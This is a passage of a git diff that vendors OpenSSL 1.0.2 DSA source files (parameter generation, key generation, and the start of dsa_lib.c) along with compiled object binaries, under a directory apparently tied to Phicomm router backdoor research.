+                pmd = md + mdsize - qsize;
+            else
+                pmd = md;
+
+            if (mdsize < qsize)
+                memset(md + mdsize, 0, qsize - mdsize);
+
+            /* step 3 */
+            pmd[0] |= 0x80;
+            pmd[qsize - 1] |= 0x01;
+            if (!BN_bin2bn(pmd, qsize, q))
+                goto err;
+
+            /* step 4 */
+            r = BN_is_prime_fasttest_ex(q, DSS_prime_checks, ctx,
+                                        seed_in ? 1 : 0, cb);
+            if (r > 0)
+                break;
+            if (r != 0)
+                goto err;
+            /* Provided seed didn't produce a prime: error */
+            if (seed_in) {
+                ok = 0;
+                DSAerr(DSA_F_DSA_BUILTIN_PARAMGEN2, DSA_R_Q_NOT_PRIME);
+                goto err;
+            }
+
+            /* do a callback call */
+            /* step 5 */
+        }
+        /* Copy seed to seed_out before we mess with it */
+        if (seed_out)
+            memcpy(seed_out, seed, seed_len);
+
+        if (!BN_GENCB_call(cb, 2, 0))
+            goto err;
+        if (!BN_GENCB_call(cb, 3, 0))
+            goto err;
+
+        /* step 6 */
+        counter = 0;
+        /* "offset = 1" */
+
+        n = (L - 1) / (mdsize << 3);
+
+        for (;;) {
+            if ((counter != 0) && !BN_GENCB_call(cb, 0, counter))
+                goto err;
+
+            /* step 7 */
+            BN_zero(W);
+            /* now 'buf' contains "SEED + offset - 1" */
+            for (k = 0; k <= n; k++) {
+                /*
+                 * obtain "SEED + offset + k" by incrementing:
+                 */
+                for (i = seed_len - 1; i >= 0; i--) {
+                    seed[i]++;
+                    if (seed[i] != 0)
+                        break;
+                }
+
+                if (!EVP_Digest(seed, seed_len, md, NULL, evpmd, NULL))
+                    goto err;
+
+                /* step 8 */
+                if (!BN_bin2bn(md, mdsize, r0))
+                    goto err;
+                if (!BN_lshift(r0, r0, (mdsize << 3) * k))
+                    goto err;
+                if (!BN_add(W, W, r0))
+                    goto err;
+            }
+
+            /* more of step 8 */
+            if (!BN_mask_bits(W, L - 1))
+                goto err;
+            if (!BN_copy(X, W))
+                goto err;
+            if (!BN_add(X, X, test))
+                goto err;
+
+            /* step 9 */
+            if (!BN_lshift1(r0, q))
+                goto err;
+            if (!BN_mod(c, X, r0, ctx))
+                goto err;
+            if (!BN_sub(r0, c, BN_value_one()))
+                goto err;
+            if (!BN_sub(p, X, r0))
+                goto err;
+
+            /* step 10 */
+            if (BN_cmp(p, test) >= 0) {
+                /* step 11 */
+                r = BN_is_prime_fasttest_ex(p, DSS_prime_checks, ctx, 1, cb);
+                if (r > 0)
+                    goto end;   /* found it */
+                if (r != 0)
+                    goto err;
+            }
+
+            /* step 13 */
+            counter++;
+            /* "offset = offset + n + 1" */
+
+            /* step 14 */
+            if (counter >= (int)(4 * L))
+                break;
+        }
+        if (seed_in) {
+            ok = 0;
+            DSAerr(DSA_F_DSA_BUILTIN_PARAMGEN2, DSA_R_INVALID_PARAMETERS);
+            goto err;
+        }
+    }
+ end:
+    if (!BN_GENCB_call(cb, 2, 1))
+        goto err;
+
+ g_only:
+
+    /* We now need to generate g */
+    /* Set r0=(p-1)/q */
+    if (!BN_sub(test, p, BN_value_one()))
+        goto err;
+    if (!BN_div(r0, NULL, test, q, ctx))
+        goto err;
+
+    if (idx < 0) {
+        if (!BN_set_word(test, h))
+            goto err;
+    } else
+        h = 1;
+    if (!BN_MONT_CTX_set(mont, p, ctx))
+        goto err;
+
+    for (;;) {
+        static const unsigned char ggen[4] = { 0x67, 0x67, 0x65, 0x6e };
+        if (idx >= 0) {
+            md[0] = idx & 0xff;
+            md[1] = (h >> 8) & 0xff;
+            md[2] = h & 0xff;
+            if (!EVP_DigestInit_ex(&mctx, evpmd, NULL))
+                goto err;
+            if (!EVP_DigestUpdate(&mctx, seed_tmp, seed_len))
+                goto err;
+            if (!EVP_DigestUpdate(&mctx, ggen, sizeof(ggen)))
+                goto err;
+            if (!EVP_DigestUpdate(&mctx, md, 3))
+                goto err;
+            if (!EVP_DigestFinal_ex(&mctx, md, NULL))
+                goto err;
+            if (!BN_bin2bn(md, mdsize, test))
+                goto err;
+        }
+        /* g=test^r0%p */
+        if (!BN_mod_exp_mont(g, test, r0, p, ctx, mont))
+            goto err;
+        if (!BN_is_one(g))
+            break;
+        if (idx < 0 && !BN_add(test, test, BN_value_one()))
+            goto err;
+        h++;
+        if (idx >= 0 && h > 0xffff)
+            goto err;
+    }
+
+    if (!BN_GENCB_call(cb, 3, 1))
+        goto err;
+
+    ok = 1;
+ err:
+    if (ok == 1) {
+        if (p != ret->p) {
+            if (ret->p)
+                BN_free(ret->p);
+            ret->p = BN_dup(p);
+        }
+        if (q != ret->q) {
+            if (ret->q)
+                BN_free(ret->q);
+            ret->q = BN_dup(q);
+        }
+        if (ret->g)
+            BN_free(ret->g);
+        ret->g = BN_dup(g);
+        if (ret->p == NULL || ret->q == NULL || ret->g == NULL) {
+            ok = -1;
+            goto err;
+        }
+        if (counter_ret != NULL)
+            *counter_ret = counter;
+        if (h_ret != NULL)
+            *h_ret = h;
+    }
+    if (seed)
+        OPENSSL_free(seed);
+    if (seed_out != seed_tmp)
+        OPENSSL_free(seed_tmp);
+    if (ctx) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    if (mont != NULL)
+        BN_MONT_CTX_free(mont);
+    EVP_MD_CTX_cleanup(&mctx);
+    return ok;
+}
+
+int dsa_paramgen_check_g(DSA *dsa)
+{
+    BN_CTX *ctx;
+    BIGNUM *tmp;
+    BN_MONT_CTX *mont = NULL;
+    int rv = -1;
+    ctx = BN_CTX_new();
+    if (!ctx)
+        return -1;
+    BN_CTX_start(ctx);
+    if (BN_cmp(dsa->g, BN_value_one()) <= 0)
+        return 0;
+    if (BN_cmp(dsa->g, dsa->p) >= 0)
+        return 0;
+    tmp = BN_CTX_get(ctx);
+    if (!tmp)
+        goto err;
+    if ((mont = BN_MONT_CTX_new()) == NULL)
+        goto err;
+    if (!BN_MONT_CTX_set(mont, dsa->p, ctx))
+        goto err;
+    /* Work out g^q mod p */
+    if (!BN_mod_exp_mont(tmp, dsa->g, dsa->q, dsa->p, ctx, mont))
+        goto err;
+    if (!BN_cmp(tmp, BN_value_one()))
+        rv = 1;
+    else
+        rv = 0;
+ err:
+    BN_CTX_end(ctx);
+    if (mont)
+        BN_MONT_CTX_free(mont);
+    BN_CTX_free(ctx);
+    return rv;
+
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_gen.o
new file mode 100644
index 0000000000000000000000000000000000000000..61d775870f2e1675d2d3870e64377d8532b87ac8
GIT binary patch
literal 12320
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
UO?P9V{;$~fCxn*VpZxy+4Xg<J@&Et;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.c
new file mode 100644
index 0000000..e8c8d2e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.c
@@ -0,0 +1,145 @@
+/* crypto/dsa/dsa_key.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#ifndef OPENSSL_NO_SHA
+# include <openssl/bn.h>
+# include <openssl/dsa.h>
+# include <openssl/rand.h>
+
+# ifdef OPENSSL_FIPS
+#  include <openssl/fips.h>
+# endif
+
+static int dsa_builtin_keygen(DSA *dsa);
+
+int DSA_generate_key(DSA *dsa)
+{
+# ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(dsa->meth->flags & DSA_FLAG_FIPS_METHOD)
+        && !(dsa->flags & DSA_FLAG_NON_FIPS_ALLOW)) {
+        DSAerr(DSA_F_DSA_GENERATE_KEY, DSA_R_NON_FIPS_DSA_METHOD);
+        return 0;
+    }
+# endif
+    if (dsa->meth->dsa_keygen)
+        return dsa->meth->dsa_keygen(dsa);
+# ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_dsa_generate_key(dsa);
+# endif
+    return dsa_builtin_keygen(dsa);
+}
+
+static int dsa_builtin_keygen(DSA *dsa)
+{
+    int ok = 0;
+    BN_CTX *ctx = NULL;
+    BIGNUM *pub_key = NULL, *priv_key = NULL;
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+
+    if (dsa->priv_key == NULL) {
+        if ((priv_key = BN_new()) == NULL)
+            goto err;
+    } else
+        priv_key = dsa->priv_key;
+
+    do
+        if (!BN_rand_range(priv_key, dsa->q))
+            goto err;
+    while (BN_is_zero(priv_key)) ;
+
+    if (dsa->pub_key == NULL) {
+        if ((pub_key = BN_new()) == NULL)
+            goto err;
+    } else
+        pub_key = dsa->pub_key;
+
+    {
+        BIGNUM local_prk;
+        BIGNUM *prk;
+
+        if ((dsa->flags & DSA_FLAG_NO_EXP_CONSTTIME) == 0) {
+            BN_init(&local_prk);
+            prk = &local_prk;
+            BN_with_flags(prk, priv_key, BN_FLG_CONSTTIME);
+        } else
+            prk = priv_key;
+
+        if (!BN_mod_exp(pub_key, dsa->g, prk, dsa->p, ctx))
+            goto err;
+    }
+
+    dsa->priv_key = priv_key;
+    dsa->pub_key = pub_key;
+    ok = 1;
+
+ err:
+    if ((pub_key != NULL) && (dsa->pub_key == NULL))
+        BN_free(pub_key);
+    if ((priv_key != NULL) && (dsa->priv_key == NULL))
+        BN_free(priv_key);
+    if (ctx != NULL)
+        BN_CTX_free(ctx);
+    return (ok);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_key.o
new file mode 100644
index 0000000000000000000000000000000000000000..934f88aac66ce18fc1e9d2bccf6cf60796de2c5d
GIT binary patch
literal 2400
zcmbuA-HRJl6u@tGvfH$#vuVjgpdurz644HmR&XsUx!KI_M3Q!CH@1q~ak822F56_+
zWCnMIRWPnFjvsyWSrB~m!ABn!tXdFZ|AbNtR<XDuSSYRWoICe6w_)<42X4-}zkANT
zXU_e|yJmHEERi5W667T^=m|=QHZib^%q)__Bu)OBeC#egPhX++N^qYp)UDp{TGI-X
zPvpVL3d&Qt!mbt0ZCYXRg0-{j9qRAV;Oeiq;w_xUEZnRF-^0k{`?sN630u?F&Tan)
z8?=J&*vOA;#Mi9g55{2z4EO?YZ#zZ2pKIZ^QQPVJ*}<GYu*mno#R`6-f1C4TKCJ{d
ztHCeP)S*ejde#b(Q=ysa-S`JmO@(F}R5~;>pfX{3D%-oBIJj30ZuG8A0LoUvTCNiM
z`C71F4f=yzJhc+Ers+3WxmvJoRC?P6@l(PFy3^1V=~sh0JO?OG(>fUy%Nvhi@2XY~
zt}oKp=_0*I?QhB4%*-h*UvKzr&)1&UPwK|;!gD_B7T!5w=*F{8MHm(*NoW~p<Iv_#
z*U1<myT}x1DA`Dn#M@^{Vl$ICmOhZW0%@0lKg!1%_!+Zm=F_o~n)^g4soKX$Q_X)g
zPF3TBiLyGc(1dD~)jW)VM@h|;)D({$rEtn5`LiE4uEd@=%vogpaFoKn@?nNOg-C}~
z8dk^wsW&hc5}&ogsyFaM>k(*2r94@UfMLzB-otVNKpcN@1jqWv`JWxZUmL;Q5xg~m
zZ;jxj*>&tScS~O)<#W_tcH3^p@mxg2o~xcI(W-rBcJ`dPU@y>8)wD_Jv^}$M!EU>6
zp~+RpX*X^7S#}YwwpTsWt@WnuZf>A?spGOC3}v=$cRgom&0bnrvoATTmmxot7b3-W
z9{1v2Kay7^o|gEV5<e{QD-xIezm~Wv`QMlLq{JV`0}UeXo5;r)!KWpD1mc8$P2xu-
zu7QmL_m?%+!5_W5)$*JMXs;9L6=8MU%Z~23n;y}dj^_})(d`m_X}#5Q+rZlEo~y%~
zaGVvG_m|tgzR_9Va68@>(b){{3hac_!jts>MT05u6NhhR5g3ZNM^P{G6*lT)(6Giu
zXtI2X5M)16<Pd0FN8IQf=TCAz{E~dm>(1RCsA2pJjNqLAHNF6`IHv(k7P0=*G6Y+!
zFZ3yi$*w;M2N}lrz6=asKRidW?D2R_hG2{O3ETh!U5DfMdHfr~k?Z03Mc{G!_Zj{{
zfrx#={li!hFL>PA7&p%oy2kUsH{oDRJhI`v14MHC{CtQVN%(XR2;SAW_^){W;(ZbU
H!}0$DdZ1AT

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.c
new file mode 100644
index 0000000..eb9d21d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.c
@@ -0,0 +1,329 @@
+/* crypto/dsa/dsa_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
